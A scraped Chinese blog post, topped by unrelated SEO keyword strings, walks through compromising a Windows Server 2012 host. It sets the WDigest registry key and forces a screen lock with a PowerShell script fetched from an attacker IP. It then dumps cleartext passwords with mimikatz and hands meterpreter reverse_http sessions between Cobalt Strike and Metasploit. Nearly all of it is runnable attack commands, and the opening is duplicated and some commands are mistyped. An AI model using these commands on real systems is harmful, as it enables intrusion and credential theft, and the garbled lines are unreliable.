企业电商网站优化,网站开发后端论文,娄底住房和城乡建设部网站,如何查询网站的点击量cs与msf权限传递以及mimikatz抓取win2012明文密码
使用Cobalt Strike抓取win2012明文密码#xff0c;将会话传递到Metasploit Framework上
1.cs生成木马并使目标服务器中马
建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令
shell …cs与msf权限传递以及mimikatz抓取win2012明文密码
使用Cobalt Strike抓取win2012明文密码将会话传递到Metasploit Framework上
1.cs生成木马并使目标服务器中马
建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令
shell reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 编写一个强制锁屏脚本
Function Lock-WorkStation { $signature [DllImport(user32.dll, SetLastError true)] public static extern bool LockWorkStation(); $LockWorkStation Add-Type -memberDefinition $signature -name Win32LockWorkStation -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null } Lock-WorkStation 在锁屏脚本目录下开启http服务器控制目标服务器下载并执行锁屏脚本
shell powershell (new-object System.Net.WebClient).DownFile(http://192.168.17.132:9999/lock-screen.ps1,c:\lock-screen.ps1) #下载锁屏脚本 shell powershell c:\lock-screen.ps1 #执行锁屏脚本 管理员重新登录后再抓取明文密码
logonpasswords cs抓取成功 3.打开Metasploit Framework
调用 exploit/multi/handler 模块配置 HTTP Payload为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP端口自定义即可。
use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.17.132 set 9980 run 4.在Cobalt Strike 上创建一个Foreign HTTP的监听
成功将cs的会话传递到msf上了 mimikatz抓取win2012明文密码
1.msf生成木马文件使服务器中马 shell #进入cmd窗口 reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表 powershell #进入powershell c:\lock-screen.ps1 #运行强制锁屏脚本 上传mimikatz启动mimikatz获取明文密码
execute -i -f mimikatz.exe sekurlsa::logonpasswords 这样mimikatz就抓取到了win2012的明文密码。 创建一个监听 background use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set lhost 192.168.17.132 set lport 8899 set disablepayloadhandler true set prependmigrate true set session 2 #根据自己的session值 exploit成功将msf的会话传递到cs上了。